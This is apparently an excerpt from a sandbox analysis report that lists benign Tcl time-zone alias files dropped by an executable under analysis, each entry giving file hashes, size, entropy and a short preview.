                                                                                                                                                                                                                              SHA-512:041609C63E95322460A31AC83BCC4F8F90B8D44B2740A5CF7E37F66CCD9F928416D74D313370516D7B1780DF2C9C9A78B7069CE2DA6BFFE88C46FB47CE1A4CB2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Yap) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.940195299412468
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVqEGIV5XHAIgoqpEGYvWARL/nSi67x/yQa0EGIy:SlSWB9vsM3ymc4HAIgocVAN/27x6qF
                                                                                                                                                                                                                              MD5:E6AA2F6A05B57AA9B4AEF8E98552EEB2
                                                                                                                                                                                                                              SHA1:22470C204152702D8826CA52299E942F572C85ED
                                                                                                                                                                                                                              SHA-256:C27E1179B55BF0C7DB6F1C334C0C20C4AFA4DBB84DB6F46244B118F7EAB9C76E
                                                                                                                                                                                                                              SHA-512:B28A264907C32F848D356FB0F5776C2CE819DCB6BC08A5E2DCD4FA455EE1616966E816748079C7A55485BABFFB292D567E6F958168F945889E33A267B0E7EDA9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Warsaw)]} {.. LoadTimeZoneFile Europe/Warsaw..}..set TZData(:Poland) $TZData(:Europe/Warsaw)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.9353841548970205
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxMvLS3vXHAIgoqyMvLL6RL/nM24h8QavMvLBn:SlSWB9vsM3ymvMv2PHAIgovMvH6N/e8i
                                                                                                                                                                                                                              MD5:7D7BD6E40D3ADCA04754255D69B5CC9D
                                                                                                                                                                                                                              SHA1:EE32167B450DE7B0F1A15199795AEF9524BE623B
                                                                                                                                                                                                                              SHA-256:EFD666F3062D52C5D0B4F83B1A206E6840C1EAEC356CD77A0A71C7EDFA78C964
                                                                                                                                                                                                                              SHA-512:6056AAF078316A89079D19555F0BAEFB4C1CDBAA5426A8BEE76E0BFA5C69A5DAAFD199DEF978ABD67287AE1B80F754B7845EAFD5CC0995FE10E44D1F34D5435C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Lisbon)]} {.. LoadTimeZoneFile Europe/Lisbon..}..set TZData(:Portugal) $TZData(:Europe/Lisbon)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                              Entropy (8bit):4.795776391333205
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qMveyXHAIgNqBLFARL/lOr4WFKfMy:SlSWB9vsM3yKMveSHAIgcBJAN/S4wKfB
                                                                                                                                                                                                                              MD5:C5AE3A1DAD32C870651C74E367F604CF
                                                                                                                                                                                                                              SHA1:9FF81383C43D98441841E182BC783381EF565204
                                                                                                                                                                                                                              SHA-256:9AEC39777013B23D63D0509EBB2F01D57A2C1592264DBB19CE2C61C7D7DDD8DE
                                                                                                                                                                                                                              SHA-512:3A7217ED885011972262B71DB7F5D7E4C9C6E82B4BEEF0718BCB9452E49FDBDD5ED78564156577AB09150140B862E1944B4B739BCE0C50E63667050C35329503
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Taipei)]} {.. LoadTimeZoneFile Asia/Taipei..}..set TZData(:ROC) $TZData(:Asia/Taipei)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):162
                                                                                                                                                                                                                              Entropy (8bit):4.900717350092823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ZQckovXHAIgNtvQMHRL/lmFeWFKKQ7:SlSWB9vsM3yJJHAIgbHN/pwKv
                                                                                                                                                                                                                              MD5:59E4C80F97FAFC92987B08BFA03B5EE5
                                                                                                                                                                                                                              SHA1:4F86FCE17A51C3789DEB887BE01A1A0E6EA3D2DE
                                                                                                                                                                                                                              SHA-256:63153B40225270ADB7CD248788CA9F18C6DEBAF222B3165BBAB633337592DF44
                                                                                                                                                                                                                              SHA-512:9FCC0F747096775D0FB8DD252A73E6F47C16BF2D7DB0C3FBDFD206EE57393276FB40F65C1441296AE2AC115CFEE11098474DF3FEF8EE1FABE139427A8991F052
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Seoul)]} {.. LoadTimeZoneFile Asia/Seoul..}..set TZData(:ROK) $TZData(:Asia/Seoul)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.85623787837429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/kZ8O5h4WFKf1z:SlSWB9vsM3yUgHAIgWv6N/kth4wKf9
                                                                                                                                                                                                                              MD5:5EABBAAF3B29B5DFF9E54136F7ABC654
                                                                                                                                                                                                                              SHA1:44615F03264012D97512F9AB386413DD72BE1090
                                                                                                                                                                                                                              SHA-256:B9443FB17F0128DDB9F2DF657DC5D2DF176F64C61B0D02B272E5DFB108537678
                                                                                                                                                                                                                              SHA-512:B930D637A1E69E0847ADDEAB013B2C25BC27EBB9CDF20B9CDDFDAC111E9F26BB5EBC83194E845ACC3E1B9A08C386C94FCC4FDE32292EB558E3F7463832BB38B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Singapore) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.996391010176349
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSNJB9vsM3y7p5oeSHAIgppON/kjx+90ppv:JByMYbpwt8+90b
                                                                                                                                                                                                                              MD5:1AC81E2C60D528A6C5BF2E6867146813
                                                                                                                                                                                                                              SHA1:73D2D24FE6D56CA34ABF11B9A95DC22F809C5158
                                                                                                                                                                                                                              SHA-256:978C4E5256057CE7374AD7929605090FC749B55558495BD0112FB0BB743FA9C2
                                                                                                                                                                                                                              SHA-512:DB2673FB54C1308BBEB298A186F9130FB9090CE33B958C82D62B9BD88EE39BAB9A1BE40645547BA4167FD475892A323CF8EBA16C97F6FDF5693F1BF7A313FE9A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:SystemV/AST4) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.9470542553730255
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/kRDwh4IAcGE2NEOyn:SlSNJB9vsM3y7UEOXHAIgpUEqA6N/k+H
                                                                                                                                                                                                                              MD5:2AB4B896957F26B114A990F69989F3FB
                                                                                                                                                                                                                              SHA1:8048C99F5EE02C021F311709B30EB28D650D884D
                                                                                                                                                                                                                              SHA-256:0114C111F5BCD838A28F2E16E01ECB79D8AFC8CBF639A672889ED0D692FC6CDC
                                                                                                                                                                                                                              SHA-512:353744359CD94B1E8184A8B83F762459C69D3AEEA43DA638C1F4CC34E01E9D86C2EBCF7F7BFD059CB23B64051510D1C4556A49D180F8A92DE8449139194DCDC9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:SystemV/AST4ADT) $TZData(:America/Halifax)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.957831162100758
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/kR/eIAcGEsAzEpv:SlSNJB9vsM3y7hzi2HAIgphznN/kc90q
                                                                                                                                                                                                                              MD5:3EC0B09EAB848821D48849673B24401C
                                                                                                                                                                                                                              SHA1:41599CBA78E124A7DA9744D2B4EA8CDC10008E0B
                                                                                                                                                                                                                              SHA-256:30428B85B37898AD98B65BE5B6A8BD599331D9A1B49605FC6521464228E32F8F
                                                                                                                                                                                                                              SHA-512:9A3303B3338C01B281A40BB48B93C446ADB92BBDC45371667F09EDA92F9EE2AEC60CE8E98CE15C0112B823799C76AEF14895B15DC997DA506494D75BBE58D662
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:SystemV/CST6) $TZData(:America/Regina)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.975428048518589
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx096yXHAIg20961yHRL/kRwx/h4IAcGE967:SlSNJB9vsM3y796SHAIgp9616N/kyxpQ
                                                                                                                                                                                                                              MD5:D85CCC5EFAA1ED549D02F09A38A53C68
                                                                                                                                                                                                                              SHA1:642ED571E4C6F60A953D42DA4F756F2262E4E709
                                                                                                                                                                                                                              SHA-256:44BEF7D4660A9A873EB762E3FDC651D31D97893545DE643FA1B2D05991C090A1
                                                                                                                                                                                                                              SHA-512:3CC6A14A17EA4833958A7D444073D6C2709FD61BF54387E5C362151E9143F795B2432B621080DD53E0FC9BDD7C58F406E046E3D0A2BBA4132D99E7C705E6D645
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Chicago)]} {.. LoadTimeZoneFile America/Chicago..}..set TZData(:SystemV/CST6CDT) $TZData(:America/Chicago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.928128138328689
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSNJB9vsM3y73G7JHAIgp3GZRN/kkp4903G8:JByMY3G7Kp3GntVp4903G8
                                                                                                                                                                                                                              MD5:506D15E2F37F501F5A592154142A5296
                                                                                                                                                                                                                              SHA1:5ACA12E0BA0FFF9734ED978A9C60AAA9D1E05A59
                                                                                                                                                                                                                              SHA-256:798F92E5DDA65818C887750016D19E6EE9445ADFE0FCB7ACB11281293A09C2C7
                                                                                                                                                                                                                              SHA-512:2EE08D39461CAD3492BE88B421BA463B4CEB8497F036518794BCF605F477057FEA218A9DFBB6335A28A5120750EA06AED9D2EA84CD0007D34CDE562DCD79CC0C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indianapolis)]} {.. LoadTimeZoneFile America/Indianapolis..}..set TZData(:SystemV/EST5) $TZData(:America/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):5.113680059406992
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSNJB9vsM3y71RHAIgp1aAN/krp4901Yn:JByMY4pltw+90q
                                                                                                                                                                                                                              MD5:AAD8EF3067E97785D4052B80F5C4ACE1
                                                                                                                                                                                                                              SHA1:3EF0A06FCC41119F4A60A32CED0E5A1E0E8B4300
                                                                                                                                                                                                                              SHA-256:D159140114A13C69F073CFE9AD0B67D713E8811CBFF773A3D1681FC38EA0E699
                                                                                                                                                                                                                              SHA-512:A8774ADF6818D85476A6C147A45E55B338F413CD9B61BF9FDB0CB7A335C0CE8F8C6D1970783FEFECC2CE18388DF91304CB295BD4DFD29FB538D74F6A414A441D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/New_York)]} {.. LoadTimeZoneFile America/New_York..}..set TZData(:SystemV/EST5EDT) $TZData(:America/New_York)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.9733028894475195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSNJB9vsM3yc6e8SHAIgOb6eKAN/kQmrheo:JByMdniinbtRTo
                                                                                                                                                                                                                              MD5:458061B3F3C8F06C61B5726393A26BA2
                                                                                                                                                                                                                              SHA1:E894F5615654D1110C9964B8F6A54C048442D8EB
                                                                                                                                                                                                                              SHA-256:BF62C8650BBA258000F62F16B0C7CBB66F4FD63F8CFDAF54273BB88A02A6C8D6
                                                                                                                                                                                                                              SHA-512:6A161A7AE44CBF8CE4C704C94456A5B714AAF2A3FAF30731254C9FE056F9DDF207119D516CC6A4C44AE76EC078F5C59F5EC6DD6701FAA3A36F061AF3953B7C7D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:SystemV/HST10) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.999038624718282
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/kRgFfh4IAcGEuto:SlSNJB9vsM3y7OBHAIgpONYyHN/kch4y
                                                                                                                                                                                                                              MD5:B06AB4998A57446FC4D5A5B986BCA0A9
                                                                                                                                                                                                                              SHA1:5E4A28466383CBAB2067B9B6D22882CF6D83C3FB
                                                                                                                                                                                                                              SHA-256:FEBE49FAE260E5595B6F1B21A0A3458D8A50ACA72F4551BF10C1EDB2758E0304
                                                                                                                                                                                                                              SHA-512:9E44174C4E348E1B768039585BA6393FD001B606E111092EEC57C75210A1E87BF3C72728321945D584CA60D4C848D88EB8B2F82CB88F38F90224A43FDCFEA9AA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:SystemV/MST7) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.956231227702093
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/kRMMFfh4IAcGE6RB:SlSNJB9vsM3y7+SPHAIgp+ON/kD490+B
                                                                                                                                                                                                                              MD5:5D3C1ADB8AC4EAC9E9A31734CD6884BD
                                                                                                                                                                                                                              SHA1:535B024EA088B9B192BE4206CBDD56BC5B163762
                                                                                                                                                                                                                              SHA-256:64556A7B20E425C79375C2A7CCF72B2B5223A7DE4FF4C99A5C039DB3456C63F6
                                                                                                                                                                                                                              SHA-512:FB799A42880613752AD6010D7B4E97ACCF7F6AE281D9A37057F6423AEF2607B608DB2AC52176F1653D8B2D086223C9658B101E73125F0FF7D6D9E8CD876EEC53
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:SystemV/MST7MDT) $TZData(:America/Denver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.831981174214766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqTQGuQTWLM4YkovXHAIgObTuQTWLovFvHRL/kRQB5nv:SlSNJB9vsM3yciQyLM4YJHAIgObiQyLQ
                                                                                                                                                                                                                              MD5:B568B46A0207800D9C022BAB1E48709B
                                                                                                                                                                                                                              SHA1:71CE3F0E75E440D5BBA219BCBB92AF9C1F5A7466
                                                                                                                                                                                                                              SHA-256:0B8227AFC94082C985E8E125DF83E5EFADE7CD9CA399800D7B8E8B2BEAE22C7D
                                                                                                                                                                                                                              SHA-512:5067AAD0CD02EBDECA6980F9C7CCC80D076C34D6463C5B6B19B678D76B5E69C1C3639D046F56FE9D6255CBEA49189EDD735F66AD9EE2CB0389BE020E7ED3AD50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pitcairn)]} {.. LoadTimeZoneFile Pacific/Pitcairn..}..set TZData(:SystemV/PST8) $TZData(:Pacific/Pitcairn)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):5.003766957083974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSNJB9vsM3y7DvPHAIgp5N/kQ1p490Dy:JByMY8p5th090W
                                                                                                                                                                                                                              MD5:7E587175CA0F938C47FA920D787C57BD
                                                                                                                                                                                                                              SHA1:C3F7D8576C0AC74D6B70F4363EE2C174FADC70B0
                                                                                                                                                                                                                              SHA-256:D51D9549835E9C058F836C8952932CB53C10F7F194CD87452E9B13494D1C54C9
                                                                                                                                                                                                                              SHA-512:4460686AAA470F07A6DB1F8957FA4DB600E116273497F46E8A2D3FDECF622122DF753556B78C39FA2ADFDB2AF3C3ABB3C330ADA79B35C6A3CD8C498A0319CEE6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:SystemV/PST8PDT) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.9524733332469095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqTQG5hB5WXHAIgObT5hByY6RL/kRKlUDH5hBpvn:SlSNJB9vsM3ycT2HAIgOboN/kNv
                                                                                                                                                                                                                              MD5:5970A466367825D72D9672293FCD4656
                                                                                                                                                                                                                              SHA1:1A736D61A6797295EEC8C094AED432171E98578E
                                                                                                                                                                                                                              SHA-256:55710EFDED5B5830B2F3A2A072037C5251E1766F318707ED7CD5EB03037FED43
                                                                                                                                                                                                                              SHA-512:1F2A1B2A7D0A3E410652546C174D9EC18C91C9327F11C384A0AA1EB12D7EFE85C4D53CA3C2A6C347C0068A4CE92A3138EB17232B0DEC88D52465C5DEDEEE6827
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Gambier)]} {.. LoadTimeZoneFile Pacific/Gambier..}..set TZData(:SystemV/YST9) $TZData(:Pacific/Gambier)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.994125896811442
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSNJB9vsM3y7/9EtDSHAIgp/9Ef6N/kB490/9E9v:JByMY/947p/9XtN90/9s
                                                                                                                                                                                                                              MD5:560B18DFB138DAF821CFDAE017B94473
                                                                                                                                                                                                                              SHA1:0BB0312C742CC0097DF033656AE3D10723035C30
                                                                                                                                                                                                                              SHA-256:DA20018DE301F879E4F026405C69FA0370EB10184FE1C84A4F1504079D5DAFA1
                                                                                                                                                                                                                              SHA-512:B1D4EAD5F549E319DAD55EE67DAFD732E755164748C08633AA8F07C280B2CF617380D6F886304142D0E4D50026E63678DACFBE2DC809F780BA4CFF35A90DE906
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Anchorage)]} {.. LoadTimeZoneFile America/Anchorage..}..set TZData(:SystemV/YST9YDT) $TZData(:America/Anchorage)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.9295990493611495
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/jCl1yQaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/SymKv
                                                                                                                                                                                                                              MD5:1FABF2DFD4BFD0184AE22ED76F7569E5
                                                                                                                                                                                                                              SHA1:5859266B26357B4FCADD7EC65847667631E303EB
                                                                                                                                                                                                                              SHA-256:8471A5575B9D9E47412D851A18A26C4405480540AABC8DAED5F81BE0C714C07C
                                                                                                                                                                                                                              SHA-512:1DCBECEF6D1F923E6C9CEA70CB10F1FF4E453265966AA88FBC8739E93EF40F8A16AAD85AF4ECC5CC1E52F22F49E5D3F4EE01A97DE2302FC4FBC063FE814F3851
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Turkey) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                              Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iGMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iP8RX
                                                                                                                                                                                                                              MD5:DA060D2F397C978E0842631B4EC73376
                                                                                                                                                                                                                              SHA1:649BC85430B04662BE079C0AAD43DF5D5D499D28
                                                                                                                                                                                                                              SHA-256:356A9BB6F831971C295CF4DCE0F0CDC9EDF94FD686CA3D3195E5F031A0B67CBA
                                                                                                                                                                                                                              SHA-512:3359BFC6F0837D2DA9D72DA8053773CE0C1A1B1A47C33163BF38965E2104F57BC147F9EEC228A3591B75BF1BA93285AB83E8427E8E2E697AB18501DC017B6E6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UCT) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.911775112130145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/VXEtDovXHAIg20/VXEfovRL/iOGl0IAcGE/VXEN:SlSWB9vsM3y7/9EtDSHAIgp/9Ef6N/i4
                                                                                                                                                                                                                              MD5:4379C0BF618649AA07CC4BDAC75F62EF
